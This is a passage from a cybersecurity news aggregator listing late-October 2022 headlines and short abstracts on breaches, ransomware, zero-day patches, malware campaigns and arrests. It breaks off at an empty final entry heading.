October, 2022
October 31, 2022 – Vulnerabilities
Mozilla Firefox fixes freezes caused by new Windows 11 feature Full Text
Abstract
Mozilla has fixed a known issue causing the Firefox web browser to freeze when copying text on Windows 11 devices where the Suggested Actions clipboard feature is enabled.BleepingComputer
October 31, 2022 – Breach
Label Printing Giant Multi-Color Corporation Discloses Data Breach Full Text
Abstract
An investigation launched into the incident has revealed that sensitive HR data might have been compromised, including “personnel files and information on enrollment in our benefits programs”.Security Week
October 31, 2022 – Denial Of Service
Fodcha DDoS Botnet Resurfaces with New Capabilities Full Text
Abstract
The threat actor behind the Fodcha distributed denial-of-service (DDoS) botnet has resurfaced with new capabilities, researchers reveal. This includes changes to its communication protocol and the ability to extort cryptocurrency payments in exchange for stopping the DDoS attack against a target, Qihoo 360's Network Security Research Lab said in a report published last week. Fodcha first came to light earlier this April, with the malware propagating through known vulnerabilities in Android and IoT devices as well as weak Telnet or SSH passwords. The cybersecurity company said that Fodcha has evolved into a large-scale botnet with over 60,000 active nodes and 40 command-and-control (C2) domains that can "easily generate more than 1 Tbps traffic." Peak activity is said to have occurred on October 11, 2022, when the malware targeted 1,396 devices in a single day. The top countries singled out by the botnet since late June 2022 comprises China, the U.S., Singapore,The Hacker News
October 31, 2022 – Vulnerabilities
VMware warns of the public availability of CVE-2021-39144 exploit code Full Text
Abstract
VMware warned of the availability of a public exploit for a recently addressed critical remote code execution flaw in NSX Data Center for vSphere (NSX-V). VMware warned of the existence of a public exploit targeting a recently addressed critical remote...Security Affairs
October 31, 2022 – Breach
Hackers selling access to 576 corporate networks for $4 million Full Text
Abstract
A new report shows that hackers are selling access to 576 corporate networks worldwide for a total cumulative sales price of $4,000,000, fueling attacks on the enterprise.BleepingComputer
October 31, 2022 – Malware
Banking Trojan Techniques: How Financially Motivated Malware Became Infrastructure Full Text
Abstract
While APTs get the most breathless coverage in the news, many threat actors have money on their mind rather than espionage. You can learn a lot about the innovations used by these financially motivated groups by watching banking Trojans.Palo Alto Networks
October 31, 2022 – Education
Tips for Choosing a Pentesting Company Full Text
Abstract
In today's world of automated hacking systems, frequent data breaches and consumer protection regulations such as GDPR and PCI DSS, penetration testing is now an essential security requirement for organisations of all sizes. But what should you look for when choosing the right provider? The sheer number of providers can be daunting, and finding one which can deliver a high-quality test at a reasonable price is not easy. How do you know if they're any good? What level of security expertise was included in the report? Is your application secure, or did the supplier simply not find the weaknesses? There are no easy answers, but you can make it easier by asking the right questions up front. The most important considerations fall into three categories: certifications, experience, and price. Certifications Certifications are the best place to start, as they provide a quick shortcut for building trust. There's no shortage of professional certifications available, but one of tThe Hacker News
October 31, 2022 – Vulnerabilities
Actively exploited Windows Mark-of-the-Web zero-day received an unofficial patch Full Text
Abstract
An unofficial patch for an actively exploited flaw in Microsoft Windows that allows to bypass Mark-of-the-Web (MotW) protections. 0patch released an unofficial patch to address an actively exploited security vulnerability in Microsoft Windows that...Security Affairs
October 31, 2022 – Policy and Law
Chegg sued by FTC after suffering four data breaches within 3 years Full Text
Abstract
The U.S. Federal Trade Commission (FTC) has sued education technology company Chegg after it exposed the sensitive information of tens of millions of customers and employees in four data breaches suffered since 2017.BleepingComputer
October 31, 2022 – Attack
Ransomware Attack on Australian Defense Contractor May Expose Private Communications Between ADF Members Full Text
Abstract
A ransomware attack may have resulted in data related to private communications between current and former Australian defense force members being compromised, with as many as 40,000 records at risk.The Guardian
October 31, 2022 – Vulnerabilities
Unofficial Patch Released for New Actively Exploited Windows MotW Vulnerability Full Text
Abstract
An unofficial patch has been made available for an actively exploited security flaw in Microsoft Windows that makes it possible for files signed with malformed signatures to sneak past Mark-of-the-Web ( MotW ) protections. The fix, released by 0patch, arrives weeks after HP Wolf Security disclosed a Magniber ransomware campaign that targets users with fake security updates which employ a JavaScript file to proliferate the file-encrypting malware. While files downloaded from the internet in Windows are tagged with a MotW flag to prevent unauthorized actions, it has since been found that corrupt Authenticode signatures can be used to allow the execution of arbitrary executables without any SmartScreen warning . Authenticode is a Microsoft code-signing technology that authenticates the identity of the publisher of a particular piece of software and verifies whether the software was tampered with after it was signed and published. "The [JavaScript] file actually has the MoThe Hacker News
October 31, 2022 – Malware
Wannacry, the hybrid malware that brought the world to its knees Full Text
Abstract
Reflecting on the Wannacry ransomware attack, which is the lesson learnt e why most organizations are still ignoring it. In the early afternoon of Friday 12 May 2017, the media broke the news of a global computer security attack carried out through...Security Affairs
October 31, 2022 – Government
NSA shares supply chain security tips for software suppliers Full Text
Abstract
NSA, CISA, and the Office of the Director of National Intelligence (ODNI) have shared a new set of suggested practices that software suppliers (vendors) can follow to secure the supply chain.BleepingComputer
October 31, 2022 – Breach
Air New Zealand Faces Cybersecurity Breach, Multiple Accounts Compromised Full Text
Abstract
The breach was an instance of “credential stuffing”, in which scammers used email and password information stolen from another online source to hack into Air NZ Airpoints accounts.Stuff NZ
October 31, 2022 – Vulnerabilities
Samsung Galaxy Store Bug Could’ve Let Hackers Secretly Install Apps on Targeted Devices Full Text
Abstract
A now-patched security flaw has been disclosed in the Galaxy Store app for Samsung devices that could potentially trigger remote command execution on affected phones. The vulnerability, which affects Galaxy Store version 4.5.32.4, relates to a cross-site scripting (XSS) bug that occurs when handling certain deep links . An independent security researcher has been credited with reporting the issue. "Here, by not checking the deep link securely, when a user accesses a link from a website containing the deeplink, the attacker can execute JS code in the webview context of the Galaxy Store application," SSD Secure Disclosure said in an advisory posted last week. XSS attacks allow an adversary to inject and execute malicious JavaScript code when visiting a website from a browser or another application. The issue identified in the Galaxy Store app has to do with how deep links are configured for Samsung's Marketing & Content Service ( MCS ), potentially leading toThe Hacker News
October 31, 2022 – Attack
Snatch group claims to have hacked military provider HENSOLDT France Full Text
Abstract
The Snatch ransomware group claims to have hacked HENSOLDT France, a company specializing in military and defense electronics. The Snatch ransomware group claims to have hacked the French company HENSOLDT France. HENSOLDT is a company specializing...Security Affairs
October 31, 2022 – Hacker
Hacking group abuses antivirus software to launch LODEINFO malware Full Text
Abstract
The Chinese Cicada hacking group, tracked as APT10, was observed abusing security software to install a new version of the LODEINFO malware against Japanese organizations.BleepingComputer
October 31, 2022 – General
Kids today are ‘overly confident’ about their skills online—losing $101.4 million to hackers last year Full Text
Abstract
People under the age of 20 lost $101.4 million to online scams in 2021 as compared to just $8.3 million in 2017, according to a recent study from cybersecurity startup Social Catfish, which cited figures from the FBI’s Internet Crime Report.CNBC
October 31, 2022 – Vulnerabilities
GitHub Repojacking Bug Could’ve Allowed Attackers to Takeover Other Users’ Repositories Full Text
Abstract
Cloud-based repository hosting service GitHub has addressed a high-severity security flaw that could have been exploited to create malicious repositories and mount supply chain attacks. The RepoJacking technique, disclosed by Checkmarx, entails a bypass of a protection mechanism called popular repository namespace retirement , which aims to prevent developers from pulling unsafe repositories with the same name. The issue was addressed by the Microsoft-owned subsidiary on September 19, 2022 following responsible disclosure. RepoJacking occurs when a creator of a repository opts to change the username, potentially enabling a threat actor to claim the old username and publish a rogue repository with the same name in an attempt to trick users into downloading them. While Microsoft's countermeasure "retire[s] the namespace of any open source project that had more than 100 clones in the week leading up to the owner's account being renamed or deleted," CheckmarxThe Hacker News
October 31, 2022 – Vulnerabilities
GitHub flaw could have allowed attackers to takeover repositories of other users Full Text
Abstract
A critical flaw in the cloud-based repository hosting service GitHub could've allowed attackers to takeover other repositories. The cloud-based repository hosting service GitHub has addressed a vulnerability that could have been exploited by threat...Security Affairs
October 31, 2022 – Attack
Indianapolis Low-Income Housing Agency Hit by Ransomware Attack Full Text
Abstract
The attack delayed the Indianapolis Housing Agency’s ability to send out October rent payments to landlords for the federal housing choice voucher program, also known as Section 8, which 8,000 Indianapolis families depend on.Security Week
October 31, 2022 – General
Bosses say they’re serious about cybersecurity. It’s time for them to prove it Full Text
Abstract
While the post-pandemic tech boom has been a blessing for tech-savvy professionals with a knack for anything software related, it has also left companies more exposed than ever to the dangers lurking in cyberspace.ZDNet
October 31, 2022 – Malware
Malicious dropper apps on Play Store totaled 30.000+ installations Full Text
Abstract
ThreatFabric researchers discovered five malicious dropper apps on Google Play Store with more than 130,000 downloads. Researchers at ThreatFabric have discovered five malicious dropper apps on the official Google Play Store. The malicious dropper...Security Affairs
October 31, 2022 – Malware
ShadowPad Malware Analysis Highlights C2 Infrastructure and New Associations Full Text
Abstract
Between September 2021 to September 2022, 83 ShadowPad C2 servers (75 unique IPs) were identified on the internet. ShadowPad supports six C2 protocols: TCP, SSL, HTTP, HTTPS, UDP, and DNS.Cyware Alerts - Hacker News
October 31, 2022 – Attack
DEV-0950 Uses Raspberry Robin Worm in Cl0p Ransomware Attacks Full Text
Abstract
The Raspberry Robin malware, which was initially spread via external USB drives, is now using additional infection methods and working with other malware families in its recent cyberattacks.Cyware Alerts - Hacker News
October 30, 2022 – Malware
New Azov data wiper tries to frame researchers and BleepingComputer Full Text
Abstract
A new and destructive 'Azov Ransomware' data wiper is being heavily distributed through pirated software, key generators, and adware bundles, trying to frame well-known security researchers by claiming they are behind the attack.BleepingComputer
October 30, 2022 – Breach
Former British Prime Minister Liz Truss ‘s phone was allegedly hacked by Russian spies Full Text
Abstract
According to the Daily Mail, Former British Prime Minister Liz Truss 's personal phone was hacked by Russian spies. The personal mobile phone of British Prime Minister Liz Truss was hacked by cyber spies suspected of working for the Kremlin, the Daily...Security Affairs
October 30, 2022 – Vulnerabilities
Actively exploited Windows MoTW zero-day gets unofficial patch Full Text
Abstract
A free unofficial patch has been released for an actively exploited zero-day that allows files signed with malformed signatures to bypass Mark-of-the-Web security warnings in Windows 10 and Windows 11.BleepingComputer
October 30, 2022 – Criminals
German BKA arrested the alleged operator of Deutschland im Deep Web darknet market Full Text
Abstract
German police arrested a student that is suspected of being the administrator of 'Deutschland im Deep Web' (DiDW) darknet marketplace. Germany's Federal Criminal Police Office (BKA) has arrested a student (22) in Bavaria, who is suspected of being...Security Affairs
October 30, 2022 – Attack
BlackByte ransomware group hit Asahi Group Holdings, a precision metal manufacturing and metal solution provider Full Text
Abstract
The BlackByte ransomware group claims to have compromised Asahi Group Holdings, a precision metal manufacturing and metal solution provider. Asahi Group Holdings, Ltd. is a precision metal manufacturing and metal solution provider, for more than...Security Affairs
October 30, 2022 – Attack
Air New Zealand warns of an ongoing credential stuffing attack Full Text
Abstract
Air New Zealand suffered a security breach, multiple customers have been locked out of their accounts after the incident. Air New Zealand suffered a security breach, threat actors attempted to access customers' accounts by carrying out credential-stuffing...Security Affairs
October 30, 2022 – General
Security Affairs newsletter Round 391 Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here. Twilio...Security Affairs
October 29, 2022 – Breach
Bed Bath & Beyond reviewing possible data breach Full Text
Abstract
Bed Bath & Beyond said that it has no reason to believe that any sensitive or personally identifiable information was accessed and this cybersecurity incident would likely not have a material impact on the company.Yahoo Finance
October 29, 2022 – Breach
Twilio Reveals Another Breach from the Same Hackers Behind the August Hack Full Text
Abstract
Communication services provider Twilio this week disclosed that it experienced another "brief security incident" in June 2022 perpetrated by the same threat actor behind the August hack that resulted in unauthorized access of customer information. The security event occurred on June 29, 2022, the company said in an updated advisory shared this week, as part of its probe into the digital break-in. "In the June incident, a Twilio employee was socially engineered through voice phishing (or 'vishing') to provide their credentials, and the malicious actor was able to access customer contact information for a limited number of customers," Twilio said . It further said the access gained following the successful attack was identified and thwarted within 12 hours, and that it had alerted impacted customers on July 2, 2022. The San Francisco-based firm did not reveal the exact number of customers impacted by the June incident, and why the disclosure was madeThe Hacker News
October 29, 2022 – Malware
Defeating Guloader Anti-Analysis Technique Full Text
Abstract
The Guloader malware uses the control flow obfuscation technique to hide its functionalities and evade detection. This technique impedes both static and dynamic analysis.Palo Alto Networks
October 29, 2022 – Solution
New open-source tool scans public AWS S3 buckets for secrets Full Text
Abstract
A new open-source 'S3crets Scanner' scanner allows researchers and red-teamers to search for 'secrets' mistakenly stored in publicly exposed or company's Amazon AWS S3 storage buckets.BleepingComputer
October 29, 2022 – Breach
Twilio discloses another security incident that took place in June Full Text
Abstract
Twilio suffered another brief security incident in June 2022, the attack was conducted by the same threat actor of the August hack. The Communications company Twilio announced that it suffered another "brief security incident" on June 29, 2022,...Security Affairs
October 29, 2022 – Attack
A massive cyberattack hit Slovak and Polish Parliaments Full Text
Abstract
The Slovak and Polish parliaments were hit by a massive cyber attack, and the voting system in Slovakia's legislature was brought down. A massive cyber attack hit the Slovak and Polish parliaments, reported the authorities. The cyber attack brought...Security Affairs
October 29, 2022 – Business
How will Twitter change under Elon Musk? Full Text
Abstract
Cybhorus CEO Pierluigi Paganini talks to TRT World about Elon Musk completing his $44 billion deal to buy Twitter and what changes he will make to the social media platform. Of course, the first impact will be on the leadership, Elon Musk was critical...Security Affairs
October 28, 2022 – Vulnerabilities
ConnectWise fixes RCE bug exposing thousands of servers to attacks Full Text
Abstract
ConnectWise has released security updates to address a critical vulnerability in the ConnectWise Recover and R1Soft Server Backup Manager (SBM) secure backup solutions.BleepingComputer
October 28, 2022 – Phishing
New LinkedIn Phishing Campaign Bypasses Google Protection Full Text
Abstract
The phishing campaign targeted 500 mailboxes of employees from a national travel organization. The email comes with the subject line - "We noticed some unusual activity" - pretending to be from LinkedIn.Cyware Alerts - Hacker News
October 28, 2022 – Vulnerabilities
High-Severity Flaws in Juniper Junos OS Affect Enterprise Networking Devices Full Text
Abstract
Multiple high-severity security flaws have been disclosed as affecting Juniper Networks devices, some of which could be exploited to achieve code execution. Chief among them is a remote pre-authenticated PHP archive file deserialization vulnerability (CVE-2022-22241, CVSS score: 8.1) in the J-Web component of Junos OS, according to Octagon Networks researcher Paulos Yibelo. "This vulnerability can be exploited by an unauthenticated remote attacker to get remote phar files deserialized, leading to arbitrary file write, which leads to a remote code execution (RCE)," Yibelo said in a report shared with The Hacker News. Also identified are five other issues, which are listed as follow - CVE-2022-22242 (CVSS score: 6.1) - A pre-authenticated reflected XSS on the error page ("error.php"), allowing a remote adversary to siphon Junos OS admin session and chained with other flaws that require authentication. CVE-2022-22243 (CVSS score: 4.3) & CVE-2022-22The Hacker News
October 28, 2022 – Vulnerabilities
Multiple vulnerabilities affect the Juniper Junos OS Full Text
Abstract
Juniper Networks devices are affected by multiple high-severity issues, including code execution vulnerabilities. Multiple high-severity security vulnerabilities have been discovered in Juniper Networks devices. "Multiple vulnerabilities have been...Security Affairs
October 28, 2022 – Ransomware
The Week in Ransomware - October 28th 2022 - Healthcare leaks Full Text
Abstract
This week, we learned of healthcare data leaks out of Australia, information about existing attacks, and reports on how ransomware gangs operate and partner with malware developers for initial access.BleepingComputer
October 28, 2022 – APT
Kimsuky APT Adds New Android Malware to its Arsenal Full Text
Abstract
As per the findings by S2W’s threat research and intelligence center, the three new malware, FastFire, FastViewer, and FastSpy, are masquerading as APKs for three utility tools on Google Play Store.Cyware Alerts - Hacker News
October 28, 2022 – Malware
These Dropper Apps On Play Store Targeting Over 200 Banking and Cryptocurrency Wallets Full Text
Abstract
Five malicious dropper Android apps with over 130,000 cumulative installations have been discovered on the Google Play Store distributing banking trojans like SharkBot and Vultur , which are capable of stealing financial data and performing on-device fraud. "These droppers continue the unstopping evolution of malicious apps sneaking to the official store," Dutch mobile security firm ThreatFabric told The Hacker News in a statement. "This evolution includes following newly introduced policies and masquerading as file managers and overcoming limitations by side-loading the malicious payload through the web browser." Targets of these droppers include 231 banking and cryptocurrency wallet apps from financial institutions in Italy, the U.K., Germany, Spain, Poland, Austria, the U.S., Australia, France, and the Netherlands. Dropper apps on official app stores like Google Play have increasingly become a popular and efficient technique to distribute banking mThe Hacker News
October 28, 2022 – Vulnerabilities
Google fixes a new actively exploited Chrome zero-day, it is the seventh one this year Full Text
Abstract
Google Thursday released an emergency patch for Chrome 107 to address the actively exploited zero-day vulnerability CVE-2022-3723. Google released an emergency update for the Chrome 107 to address an actively exploited zero-day vulnerability...Security Affairs
October 28, 2022 – Outage
Largest EU copper producer Aurubis suffers cyberattack, IT outage Full Text
Abstract
German copper producer Aurubis has announced that it suffered a cyberattack that forced it to shut down IT systems to prevent the attack's spread.BleepingComputer
October 28, 2022 – Attack
IT Systems at Polish, Slovak Parliaments Hit by Cyberattacks Full Text
Abstract
"The attack was multi-directional, including from inside the Russian Federation," the Polish Senate said in a statement. The Slovak parliament's deputy speaker Gabor Grendel told AFP: that "Parliament's entire computer network has been paralysed".Security Week
October 28, 2022 – Education
Cloud Security Made Simple in New Guidebook For Lean Teams Full Text
Abstract
Cloud computing was the lifeline that kept many companies running during the pandemic. But it was a classic case of medicine that comes with serious side effects. Having anywhere, anytime access to data and apps gives companies tremendous flexibility in a fast-changing world, plus the means to scale and customize IT at will. The cloud is an asset or upgrade in almost every way. With one glaring exception: cybersecurity. The cloud promised to make companies more secure and security more straightforward. Yet over the same time period that the cloud took over computing, cyber attacks grew steadily worse while security teams felt increasingly overwhelmed. Why? We will explain shortly. For lean security teams, the more important question is how to make cloud security work, especially as the cloud footprint grows (a lot) faster than security resources. Will the cloud always cast a shadow on cybersecurity? Not with the strategy outlined in a free ebook from Cynet called " ThThe Hacker News
October 28, 2022 – Vulnerabilities
Apple backports fixes for CVE-2022-42827 zero-day to older iPhones, iPads Full Text
Abstract
Apple released updates to backport the recently released security patches for CVE-2022-42827 zero-day to older iPhones and iPads. Apple has released new security updates to backport security patches released this week to address actively exploited...Security Affairs
October 28, 2022 – Criminals
Student arrested for running one of Germany’s largest dark web markets Full Text
Abstract
The Federal Criminal Police Office (BKA) in Germany have arrested a 22-year-old student in Bavaria, who is suspected of being the administrator of 'Deutschland im Deep Web' (DiDW) 3, one of the largest darknet markets in the country.BleepingComputer
October 28, 2022 – Vulnerabilities
VMWare patches RCE exploit in NSX Manager Full Text
Abstract
The vulnerability, caused by an old deserialization bug in an outdated Java library, could be abused to achieve pre-authentication remote code execution (RCE) on the host computer.The Daily Swig
October 28, 2022 – Hacker
Researchers Uncover Stealthy Techniques Used by Cranefly Espionage Hackers Full Text
Abstract
A recently discovered hacking group known for targeting employees dealing with corporate transactions has been linked to a new backdoor called Danfuan . This hitherto undocumented malware is delivered via another dropper called Geppei, researchers from Symantec, by Broadcom Software, said in a report shared with The Hacker News. The dropper "is being used to install a new backdoor and other tools using the novel technique of reading commands from seemingly innocuous Internet Information Services ( IIS ) logs," the researchers said. The toolset has been attributed by the cybersecurity company to a suspected espionage actor called UNC3524, aka Cranefly, which first came to light in May 2022 for its focus on bulk email collection from victims who deal with mergers and acquisitions and other financial transactions. One of the group's key malware strains is QUIETEXIT, a backdoor deployed on network appliances that do not support antivirus or endpoint detection, suchThe Hacker News
October 28, 2022 – Insider Threat
New York Post hacked? No, the culprit is an employee Full Text
Abstract
Threat actors hacked the website and Twitter account of the New York Post and published offensive messages against US politicians. New York Post confirmed that it was hacked, its website and Twitter account were used by the attackers to publish offensive...Security Affairs
October 28, 2022 – Vulnerabilities
Exploit released for critical VMware RCE vulnerability, patch now Full Text
Abstract
Proof-of-concept exploit code is now available for a pre-authentication remote code execution (RCE) vulnerability allowing attackers to execute arbitrary code remotely with root privileges on unpatched Cloud Foundation and NSX Manager appliances.BleepingComputer
October 28, 2022 – Education
Implementing Defense in Depth to Prevent and Mitigate Cyber Attacks Full Text
Abstract
The increased use of information technology in our everyday life and business has led to cyber-attacks becoming more sophisticated and large-scale. For organizations to thrive in this era of technology, they must develop robust security strategies to detect and mitigate attacks. Defense in depth is a strategy in which companies use multiple layers of security measures to safeguard assets. A well-implemented defense in depth can help organizations prevent and mitigate ongoing attacks. Defense in depth uses various cutting-edge security tools to safeguard a business's endpoints, data, applications, and networks. The objective is to prevent cyber threats, but a robust defense-in-depth approach also thwarts ongoing attacks and prevents further damage. How organizations can implement defense in depth The image above shows the various layers of security that organizations must implement. Below we describe ideas that companies should consider for each layer. Governance and risk manaThe Hacker News
October 28, 2022 – Vulnerabilities
Google fixes seventh Chrome zero-day exploited in attacks this year Full Text
Abstract
Google has released an emergency security update for the Chrome desktop web browser to address a single vulnerability known to be exploited in attacks.BleepingComputer
October 28, 2022 – Vulnerabilities
Google Issues Urgent Chrome Update to Patch Actively Exploited Zero-Day Vulnerability Full Text
Abstract
Google on Thursday rolled out emergency fixes to contain an actively exploited zero-day flaw in its Chrome web browser. The vulnerability , tracked as CVE-2022-3723 , has been described as a type confusion flaw in the V8 JavaScript engine. Security researchers Jan Vojtěšek, Milánek, and Przemek Gmerek of Avast have been credited with reporting the flaw on October 25, 2022. "Google is aware of reports that an exploit for CVE-2022-3723 exists in the wild," the internet giant acknowledged in an advisory without getting into more specifics about the nature of the attacks. CVE-2022-3723 is the third actively exploited type confusion bug in V8 this year after CVE-2022-1096 and CVE-2022-1364 . The latest fix also marks the resolution of the seventh zero-day in Google Chrome since the start of 2022 - CVE-2022-0609 - Use-after-free in Animation CVE-2022-1096 - Type confusion in V8 CVE-2022-1364 - Type confusion in V8 CVE-2022-2294 - Heap buffer overflow in WebRTCThe Hacker News
October 28, 2022 – Hacker
Hackers use Microsoft IIS web server logs to control malware Full Text
Abstract
The Cranefly hacking group, aka UNC3524, uses a previously unseen technique of controlling malware on infected devices via Microsoft Internet Information Services (IIS) web server logs.BleepingComputer
October 28, 2022 – Criminals
Raspberry Robin Operators Selling Cybercriminals Access to Thousands of Endpoints Full Text
Abstract
The Raspberry Robin worm is becoming an access-as-a-service malware for deploying other payloads, including IcedID , Bumblebee , TrueBot (aka Silence), and Clop ransomware . It is "part of a complex and interconnected malware ecosystem, with links to other malware families and alternate infection methods beyond its original USB drive spread," the Microsoft Security Threat Intelligence Center (MSTIC) said in a detailed write-up. Raspberry Robin , also called QNAP Worm owing to the use of compromised QNAP storage servers for command-and-control, is the name given to a malware by cybersecurity company Red Canary that spreads to Windows systems through infected USB drives. MSTIC is keeping tabs on the activity group behind the USB-based Raspberry Robin infections as DEV-0856 , adding it's aware of at least four confirmed entry points that all have the likely end goal of deploying ransomware. The tech giant's cybersecurity team said that Raspberry Robin hasThe Hacker News
October 28, 2022 – Malware
Android malware droppers with 130K installs found on Google Play Full Text
Abstract
A set of Android malware droppers were found infiltrating the Google Play store to install malicious programs by pretending to be app updates.BleepingComputer
October 27, 2022 – Vulnerabilities
Apple fixes recently disclosed zero-day on older iPhones, iPads Full Text
Abstract
Apple has released new security updates to backport patches released earlier this week to older iPhones and iPads, addressing an actively exploited zero-day bug.BleepingComputer
October 27, 2022 – Attack
Australian Clinical Labs Suffers Major Hack Affecting 223,000 Accounts Full Text
Abstract
Medlab became aware of unauthorized third-party access to its IT system in February and a month later, was informed by the Australian Cyber Security Centre (ACSC) that it may have been the victim of a ransomware incident.Yahoo Finance
October 27, 2022 – Policy and Law
British Hacker Charged for Operating “The Real Deal” Dark Web Marketplace Full Text
Abstract
A 34-year-old U.K. national has been arraigned in the U.S. for operating a dark web marketplace called The Real Deal that specialized in the sales of hacking tools and stolen login credentials. Daniel Kaye , who went by a litany of pseudonyms Popopret, Bestbuy, UserL0ser, and Spdrman, has been charged with five counts of access device fraud and one count of money laundering conspiracy. Kaye was indicted in April 2021, and subsequently consented to his extradition from Cyprus to the U.S. in September 2022. "While living overseas, this defendant allegedly operated an illegal website that made hacking tools and login credentials available for purchase, including those for U.S. government agencies," said U.S. Attorney Ryan K. Buchanan. Court documents show that The Real Deal , until its shutdown in 2016, functioned as a market for illicit items, including stolen account logins for U.S. government computers, bank accounts, and social media platforms such as Twitter andThe Hacker News
October 27, 2022 – Criminals
Raspberry Robin operators are selling initial access to compromised enterprise networks to ransomware gangs Full Text
Abstract
DEV-0950 group used Clop ransomware to encrypt the network of organizations previously infected with the Raspberry Robin worm. Microsoft has discovered recent activity that links the Raspberry Robin worm to human-operated ransomware attacks. Data...Security Affairs
October 27, 2022 – Ransomware
Microsoft links Raspberry Robin worm to Clop ransomware attacks Full Text
Abstract
Microsoft says a threat group tracked as DEV-0950 used Clop ransomware to encrypt the network of a victim previously infected with the Raspberry Robin worm.BleepingComputer
October 27, 2022 – Vulnerabilities
Windows Mark of the Web Zero-Days Remain Patchless, Under Exploit Full Text
Abstract
Two separate vulnerabilities exist in different versions of Windows that allow attackers to sneak malicious attachments and files past Microsoft's Mark of the Web (MoTW) security feature.Dark Reading
October 27, 2022 – Malware
Researchers Expose Over 80 ShadowPad Malware C2 Servers Full Text
Abstract
As many as 85 command-and-control (C2) servers have been discovered supported by the ShadowPad malware since September 2021, with infrastructure detected as recently as October 16, 2022. That's according to VMware's Threat Analysis Unit (TAU), which studied three ShadowPad variants using TCP, UDP, and HTTP(S) protocols for C2 communications. ShadowPad , seen as a successor to PlugX , is a modular malware platform privately shared among multiple Chinese state-sponsored actors since 2015. Taiwanese cybersecurity firm TeamT5, earlier this May, disclosed details of another China-nexus modular implant named Pangolin8RAT , which is believed to be the successor of the PlugX and ShadowPad malware families, linking it to a threat group dubbed Tianwu. An analysis of the three ShadowPad artifacts, which have been previously put to use by Winnti , Tonto Team , and an emerging threat cluster codenamed Space Pirates , made it possible to discover the C2 servers by scanning thThe Hacker News
October 27, 2022 – Breach
Thomson Reuters collected and leaked at least 3TB of sensitive data Full Text
Abstract
The multinational media conglomerate Thomson Reuters left a database with sensitive customer and corporate data exposed online Original post at https://cybernews.com/security/thomson-reuters-leaked-terabytes-sensitive-data/ Thomson Reuters, a multinational...Security Affairs
October 27, 2022 – Breach
Australian Clinical Labs says patient data stolen in ransomware attack Full Text
Abstract
Australian Clinical Labs (ACL) has disclosed a February 2022 data breach that impacted its Medlab Pathology business, exposing the medical records and other sensitive information of 223,000 people.BleepingComputer
October 27, 2022 – Phishing
LinkedIn Phishing Spoof Bypasses Google Workspace Security Full Text
Abstract
A phishing email purportedly from LinkedIn with the subject line "We noticed some unusual activity" was discovered targeting users at a travel organization, in an attempt to pilfer their credentials on the social media platform.Dark Reading
October 27, 2022 – Ransomware
Ransomware: Open Source to the Rescue Full Text
Abstract
Automobile, Energy, Media, Ransomware? When thinking about verticals, one may not instantly think of cyber-criminality. Yet, every move made by governments, clients, and private contractors screams toward normalizing those menaces as a new vertical. Ransomware has every trait of the classical economical vertical. A thriving ecosystem of insurers, negotiators, software providers, and managed service experts. This cybercrime branch looks at a loot stash that counts for trillions of dollars. The cybersecurity industry is too happy to provide services, software, and insurance to accommodate this new normal. Intense insurer lobbying in France led the finance ministry to give a positive opinion about reimbursing ransoms, against the very advice of its government's cybersecurity branch. The market is so big and juicy that no one can get in the way of "the development of the cyber insurance market." In the US, Colonial pipeline is seeking tax reductions from the loss incuThe Hacker News
October 27, 2022 – Vulnerabilities
SiriSpy flaw allows eavesdropping on users’ conversations with Siri Full Text
Abstract
SiriSpy is a vulnerability affecting Apple iOS and macOS that allowed apps to eavesdrop on users' conversations with Siri. SiriSpy is a now-patched vulnerability, tracked as CVE-2022-32946, in Apple's iOS and macOS that could have potentially allowed...Security Affairs
October 27, 2022 – Malware
Drinik Android malware now targets users of 18 Indian banks Full Text
Abstract
A new version of the Drinik Android banking trojan targets 18 Indian banks, masquerading as the country's official tax management app to steal victims' personal information and banking credentials.BleepingComputer
October 27, 2022 – Disinformation
A Pro-China Disinfo Campaign Is Targeting US Elections—Badly Full Text
Abstract
On Wednesday, Mandiant published new findings about a group it calls Dragonbridge, which it's seen for years promoting pro-Chinese interests in fake grassroots social media campaigns designed to influence politics in Taiwan and Hong Kong.Wired
October 27, 2022 – Vulnerabilities
Apple iOS and macOS Flaw Could’ve Let Apps Eavesdrop on Your Conversations with Siri Full Text
Abstract
A now-patched security flaw in Apple's iOS and macOS operating systems could have potentially enabled apps with Bluetooth access to eavesdrop on conversations with Siri. Apple said "an app may be able to record audio using a pair of connected AirPods," adding it addressed the Core Bluetooth issue in iOS 16.1 with improved entitlements. Credited with discovering and reporting the bug in August 2022 is app developer Guilherme Rambo. The bug, dubbed SiriSpy , has been assigned the identifier CVE-2022-32946. "Any app with access to Bluetooth could record your conversations with Siri and audio from the iOS keyboard dictation feature when using AirPods or Beats headsets," Rambo said in a write-up. "This would happen without the app requesting microphone access permission and without the app leaving any trace that it was listening to the microphone." The vulnerability, according to Rambo, relates to a service called DoAP that's included in AirPoThe Hacker News
October 27, 2022 – Criminals
British hacker arraigned for running The Real Deal dark web marketplace Full Text
Abstract
A popular British hacker was charged by the U.S. authorities for allegedly running the 'The Real Deal' dark web marketplace. The British hacker Daniel Kaye (aka Bestbuy, Spdrman, Popopret, UserL0ser) (34) was charged by the U.S. DoJ for allegedly...Security Affairs
October 27, 2022 – Attack
Twilio discloses another hack from June, blames voice phishing Full Text
Abstract
Cloud communications company Twilio disclosed a new data breach stemming from a June 2022 security incident where the same attackers behind the August hack accessed some customers' information.BleepingComputer
October 27, 2022 – Government
German cyber agency warns threat situation is ‘higher than ever’ Full Text
Abstract
Germany’s federal cybersecurity office BSI warned on Tuesday that ransomware, political hacking, and other cybersecurity threats facing the country are “higher than ever.”The Record
October 27, 2022 – Breach
Australian Health Insurer Medibank Suffers Breach Exposing 3.9 Million Customers’ Data Full Text
Abstract
Australian health insurance firm Medibank on Wednesday disclosed that the personal information of all of its customers had been unauthorizedly accessed following a recent ransomware attack. In an update to its ongoing investigation into the incident, the firm said the attackers had access to "significant amounts of health claims data" as well as personal data belonging to its ahm health insurance subsidiary and international students. Medibank, which is one of the largest Australian private health insurance providers, serves about 3.9 million customers across the country. "We have evidence that the criminal has removed some of this data and it is now likely that the criminal has stolen further personal and health claims data," the company further added. "As a result, we expect that the number of affected customers could grow substantially." The company also said it's continuing its probe to determine what specific data has been stolen in thThe Hacker News
October 27, 2022 – Attack
New York Post hacked with offensive headlines targeting politicians Full Text
Abstract
New York Post confirmed today that it was hacked after its website and Twitter account were used by the attackers to publish offensive headlines and tweets targeting U.S. politicians.BleepingComputer
October 27, 2022 – Cryptocurrency
